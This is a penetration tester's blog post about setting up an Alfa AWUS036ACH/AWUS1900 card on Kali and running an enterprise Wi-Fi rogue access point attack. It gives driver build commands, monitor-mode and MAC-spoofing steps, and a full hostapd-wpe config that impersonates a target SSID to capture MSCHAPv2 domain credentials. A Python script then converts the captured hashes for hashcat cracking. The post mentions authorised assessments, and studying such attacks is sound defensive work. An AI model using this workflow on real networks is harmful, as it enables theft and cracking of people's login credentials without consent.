10-10-2019 - Updated Wireless RADIUS MiTM on AWUS036ACH Kali2019.3


Edit: No longer relevant; just apt-get install realtek-rtl88xxau-dkms on an updated Kali instance now.

Edit2: Just found out this is still required for Debian 8.

Edit3: The Kali drivers are SHIT; use this method anyway.

Edit4: These things are a fickle bitch; updated 10-10-2019 for changes with the AWUS1900.

I just recently got back from a large wireless gig and found that it was time to update my wireless arsenal. I had previously been using an AWUS036NH, an AWUS051NH and an AWUS052NH. The 052 must have gotten damaged, because its signal strength barely picks up my home wireless, and the other two cards have seen better days.

Wireless drivers are super finicky: what works today on a specific kernel release may not work after tomorrow's apt update && apt upgrade -y. That's why this post is titled with the specific card and Linux version used; your experience may vary.

So first I had to decide which card I wanted. Looking over Alfa's website (https://www.alfa.com.tw/products_list.php?pc=137) for their current-generation cards, I ended up choosing the AWUS036ACH (https://www.amazon.com/Long-Range-Dual-Band-Wireless-External-Antennas/dp/B00VEEBOPG/). It was a big decision between that card and the scary-looking AWUS1900, and in hindsight, with this driver install process, the AWUS1900 should work just fine with some additional flags set.

Alright, so with my decision made, I checked out and started looking at driver install processes. It seemed pretty basic: make sure your system is up to date, install the kernel headers and dkms, purge the old 8812au drivers, etc. Much to my surprise, when I finally got my card and tried to start it up, I had no wlan interface.

I was a bit frustrated; I tried several different driver combinations and none of them seemed to work. Kali had updated its documentation to say it supported the 8812AU chipset, however that was in the Kali 2017.1 release, and the kernel changes since then broke the known-good driver. I hunted around and eventually stumbled upon a more recent forum discussion about a new driver. (https://forums.kali.org/showthread.php?36814-How-to-install-AWUS036ACH-Drivers-and-getting-it-running/page3&s=9c5700ae3cb3103ca994e4245f65d74f)

So I gave it a shot, using a combination of everything I had learned up to that point with these drivers:

--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
Initial Setup (everything below is run as root, which is the Kali 2019.3 default; otherwise prefix the commands with sudo):
apt update && apt upgrade -y
apt purge realtek-rtl88xxau-dkms -y
(purge removes the packaged driver and its config files in one step; a separate apt remove first is redundant)
apt autoremove -y && apt autoclean -y
shutdown now

Hardware Change:
Enable USB 3.0 on the VMware virtual USB controller (the default is USB 2.0); the AWUS036ACH is a USB 3.0 device.
(Note: I also ordered a Micro B to USB Type C cable so I don't have to use dongles to connect the card to my Mac - https://www.amazon.com/dp/B076DLT9RW/)

Requirements:
apt install dkms build-essential bc linux-headers-$(uname -r) -y
git clone https://github.com/aircrack-ng/rtl8812au
cd rtl8812au

Compile if using AWUS036ACH (RTL8812AU chipset):
make && make install
modprobe 8812au
(The module name depends on the branch of the repo you cloned: older branches build 8812au, the v5.x branches build 88XXau, which is also the module the Kali realtek-rtl88xxau-dkms package ships. If modprobe 8812au fails with "Module not found", look at the .ko that make install just copied under /lib/modules/$(uname -r)/kernel/drivers/net/wireless/ and modprobe that name instead. Afterwards iw dev should list the new wlan interface.)

Compile if using AWUS1900 (RTL8814AU chipset):
make RTL8814=1
make install RTL8814=1
modprobe mac80211
(mac80211 is only the kernel's wireless stack; follow it with modprobe of the driver module the build installed, as above)

Kill Known Bad Interface Processes:
airmon-ng check kill
(this stops NetworkManager and wpa_supplicant, which otherwise keep flipping the card back to managed mode; restart them, or just reboot, when you are done)

Enter Monitor Mode:
ip link set wlan0 down
iw dev wlan0 set type monitor
macchanger -r wlan0
ip link set wlan0 up

or create a shell script for haxtime:
#!/bin/sh
# Put the Alfa card into monitor mode with a random MAC. Run as root.
IFACE=${1:-wlan0}

# Both the type change and macchanger need the interface down.
ip link set "$IFACE" down
iw dev "$IFACE" set type monitor
macchanger -r "$IFACE"
# Stop NetworkManager/wpa_supplicant so they don't reset the interface.
airmon-ng check kill
ip link set "$IFACE" up
# Confirm: "type monitor" should show in the output.
iw dev "$IFACE" info


And much to my surprise, an aireplay-ng injection test:
aireplay-ng -9 -a <my ap bssid> wlan0
resulted in a perfect 30/30 score. (edit: my AWUS1900 reported 0/30 but still captured handshakes and ran hostapd-wpe ¯\_(ツ)_/¯)
--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------

My next step was to install hostapd-wpe, one of my go-to Enterprise RADIUS MiTM attack techniques. I was happy to see that Kali now includes this in the repos, making for an easy install instead of needing to patch hostapd yourself.

--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
apt-get install hostapd-wpe

To configure hostapd-wpe, modify the configuration file:

nano /etc/hostapd-wpe/hostapd-wpe.conf

so that:

interface=wlan0
(whatever name the kernel gave the Alfa card; hostapd switches it to AP mode itself, so it must be back in managed mode, not the monitor mode from the aireplay-ng test)
ssid=<Targeted SSID>
channel=1
<insert new line under channel>
ieee80211n=1
<scroll down quite a bit and change>
hw_mode=g
(channel 1 is a 2.4 GHz channel, so hw_mode has to be g; hostapd refuses to start if the channel and hw_mode disagree, and ieee80211n=1 only adds 802.11n on top of g or a)

With this configured, you can now launch hostapd-wpe. The package puts the binary in PATH, so there is no ./ to type:

hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

If it complains about the interface or driver mode, the card is most likely still in monitor mode: ip link set wlan0 down && iw dev wlan0 set type managed, then run it again.
--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
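For reference, here is what the relevant part of the file looks like once the edits above are in, written out as an added example. It is not the stock file from the Kali package and not the author's own config; the interface name, the SSID, and the certificate paths are assumptions, so keep whatever your installed /etc/hostapd-wpe/hostapd-wpe.conf already has for the EAP and certificate lines.

```ini
# Added example: /etc/hostapd-wpe/hostapd-wpe.conf after the edits above.
# hostapd does not allow comments at the end of a key=value line, so every
# comment sits on its own line.

# Interface name the kernel gave the Alfa card (assumption: wlan0).
# hostapd drives it through nl80211 and switches it to AP mode itself,
# so it must not be left in monitor mode from the aireplay-ng test.
interface=wlan0
driver=nl80211

# SSID to impersonate (placeholder; use the target's real SSID).
ssid=CorpWiFi

# channel=1 is a 2.4 GHz channel, so hw_mode must be g; hostapd refuses
# to start if the two disagree. ieee80211n=1 adds 802.11n on top of g.
hw_mode=g
channel=1
ieee80211n=1

# Enterprise (802.1X/EAP) side. wpa_key_mgmt=WPA-EAP is what makes
# clients offer their RADIUS credentials to this box's built-in EAP
# server instead of a PSK. The paths below are assumed package defaults;
# verify them against your installed file.
wpa=2
wpa_key_mgmt=WPA-EAP
rsn_pairwise=CCMP
ieee8021x=1
eap_server=1
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/certs/ca.pem
server_cert=/etc/hostapd-wpe/certs/server.pem
private_key=/etc/hostapd-wpe/certs/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/certs/dh
```

Only clients that do not validate the RADIUS server certificate will complete the EAP exchange against this AP, which is exactly the client misconfiguration the rogue AP is testing for.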

And with any luck, you can start capturing credentials, oftentimes domain credentials (only from clients that don't validate the RADIUS server certificate, which is exactly the misconfiguration this attack tests for). My go-to tactic at this point is to attempt to crack the passwords in hashcat. For this, you will need to convert the credentials from john the ripper format ($NETNTLM$<challenge>$<response>, as hostapd-wpe writes them to its log) to hashcat's -m 5500 NetNTLMv1/MSCHAPv2 format. (https://github.com/ins1gn1a/NetNTLM-Hashcat)
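The conversion is simple enough to do without the helper repo, and doing it by hand shows what the two formats actually carry. The script below is an added example, not the author's code and not the NetNTLM-Hashcat tool; it assumes hostapd-wpe's log line shape ("jtr NETNTLM: user:$NETNTLM$challenge$response") and hashcat's -m 5500 field order (user::domain:lm_response:nt_response:challenge, with the domain and LM response left empty for MSCHAPv2 captures). The log excerpt embedded in it is constructed for the example; none of the challenges or responses are real captures.

```python
#!/usr/bin/env python3
"""Convert hostapd-wpe "jtr NETNTLM" log lines into hashcat -m 5500 lines.

hostapd-wpe logs each captured MSCHAPv2 exchange as
    jtr NETNTLM:  <user>:$NETNTLM$<16 hex challenge>$<48 hex response>
hashcat's NetNTLMv1/MSCHAPv2 mode (-m 5500) expects
    <user>::<domain>:<lm response>:<nt response>:<challenge>
For an MSCHAPv2 capture there is no LM response and the domain is not part
of the hash, so both fields stay empty. (Format assumptions as stated above.)
"""
import re
import sys

# Constructed sample in the shape of a hostapd-wpe log. The accounts,
# challenges and responses are made up for this example, not real captures.
SAMPLE_LOG = """\
mschapv2: Tue Oct  8 21:13:02 2019
\t username:\t CORP\\jdoe
\t challenge:\t bd:a5:a4:d8:4b:c6:c7:3d
\t response:\t e0:69:5c:9b:0f:05:4b:9e:f9:7e:0d:c7:1c:b4:49:08:a6:53:18:d7:1b:5c:2a:2a
\t jtr NETNTLM:\t\t CORP\\jdoe:$NETNTLM$bda5a4d84bc6c73d$e0695c9b0f054b9ef97e0dc71cb44908a65318d71b5c2a2a
mschapv2: Tue Oct  8 21:14:40 2019
\t username:\t CORP\\jdoe
\t challenge:\t 01:23:45:67:89:ab:cd:ef
\t response:\t 00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff:00:11:22:33:44:55:66:77
\t jtr NETNTLM:\t\t CORP\\jdoe:$NETNTLM$0123456789abcdef$00112233445566778899aabbccddeeff0011223344556677
mschapv2: Tue Oct  8 21:20:11 2019
\t username:\t asmith
\t challenge:\t fe:dc:ba:98:76:54:32:10
\t response:\t aa:bb:cc:dd:ee:ff:00:11:aa:bb:cc:dd:ee:ff:00:11:aa:bb:cc:dd:ee:ff:00:11
\t jtr NETNTLM:\t\t asmith:$NETNTLM$fedcba9876543210$aabbccddeeff0011aabbccddeeff0011aabbccddeeff0011
"""

# Strict lengths: 8-byte challenge and 24-byte NT response, hex encoded.
# Anything else (the colon-separated challenge:/response: lines, truncated
# entries) is rejected rather than turned into a hash hashcat would choke on.
JTR_RE = re.compile(
    r"jtr NETNTLM:\s*(?P<user>[^:]+):\$NETNTLM\$"
    r"(?P<challenge>[0-9a-fA-F]{16})\$(?P<response>[0-9a-fA-F]{48})\s*$"
)


def parse_jtr(line):
    """Return (user, challenge, response) for one 'jtr NETNTLM' line, else None."""
    m = JTR_RE.search(line)
    if m is None:
        return None
    return m.group("user"), m.group("challenge").lower(), m.group("response").lower()


def to_hashcat(user, challenge, response):
    """Format one capture as a hashcat -m 5500 line (domain and LM response empty)."""
    return f"{user}::::{response}:{challenge}"


def convert_log(text, one_per_user=True):
    """Convert a whole hostapd-wpe log to a list of -m 5500 lines.

    By default only the first capture per account is kept: every capture of
    the same account cracks to the same password, so the extras just cost
    hashcat time. Pass one_per_user=False to keep all of them.
    """
    out, seen = [], set()
    for raw in text.splitlines():
        parsed = parse_jtr(raw)
        if parsed is None:
            continue
        user, challenge, response = parsed
        key = user.lower()
        if one_per_user and key in seen:
            continue
        seen.add(key)
        out.append(to_hashcat(user, challenge, response))
    return out


if __name__ == "__main__":
    # Usage: python3 wpe2hashcat.py /path/to/hostapd-wpe.log > hashes.txt
    #        hashcat -m 5500 hashes.txt wordlist.txt
    # With no argument the embedded sample is converted.
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    print("\n".join(convert_log(source)))
```

Point hashcat at the output with -m 5500. Newer hostapd-wpe builds also write a hashcat-format line next to the jtr one, so check the log first; if it is there, the conversion is a no-op.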
